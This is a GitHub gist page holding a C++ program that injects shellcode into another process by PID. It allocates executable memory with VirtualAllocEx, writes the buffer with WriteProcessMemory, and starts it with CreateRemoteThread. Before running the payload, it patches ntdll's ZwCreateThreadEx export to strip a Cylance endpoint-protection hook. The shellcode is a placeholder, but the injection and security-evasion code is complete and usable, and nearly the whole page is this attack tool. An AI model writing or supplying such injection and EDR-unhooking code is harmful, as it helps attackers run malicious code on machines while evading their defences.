Created
January 14, 2020 15:49
-
-
Save qgrosperrin/85c04d56626ae2c804b6ff294a752461 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <windows.h> | |
unsigned char buf[] = | |
"SHELLCODE_GOES_HERE"; | |
struct syscall_table { | |
int osVersion; | |
}; | |
// Remove Cylance hook from DLL export | |
void removeCylanceHook(const char *dll, const char *apiName, char code) { | |
DWORD old, newOld; | |
void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName); | |
printf("[*] Updating memory protection of %s!%s\n", dll, apiName); | |
VirtualProtect(procAddress, 10, PAGE_EXECUTE_READWRITE, &old); | |
printf("[*] Unhooking Cylance\n"); | |
memcpy(procAddress, "\x4c\x8b\xd1\xb8", 4); | |
*((char *)procAddress + 4) = code; | |
VirtualProtect(procAddress, 10, old, &newOld); | |
} | |
int main(int argc, char **argv) | |
{ | |
if (argc != 2) { | |
printf("Usage: %s PID\n", argv[0]); | |
return 2; | |
} | |
DWORD processID = atoi(argv[1]); | |
HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, false, processID); | |
if (proc == INVALID_HANDLE_VALUE) { | |
printf("[!] Error: Could not open target process: %d\n", processID); | |
return 1; | |
} | |
printf("[*] Opened target process %d\n", processID); | |
printf("[*] Allocating memory in target process with VirtualAllocEx\n"); | |
void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | |
if (alloc == (void*)0) { | |
printf("[!] Error: Could not allocate memory in target process\n"); | |
return 1; | |
} | |
printf("[*] Allocated %d bytes at memory address %p\n", sizeof(buf), alloc); | |
printf("[*] Attempting to write into victim process using WriteProcessMemory\n"); | |
if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) { | |
printf("[!] Error: Could not write to target process memory\n"); | |
return 1; | |
} | |
printf("[*] WriteProcessMemory successful\n"); | |
// Remove the NTDLL.DLL hook added by userland DLL | |
removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB); | |
printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n"); | |
HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL); | |
printf("[*] Success :D\n"); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment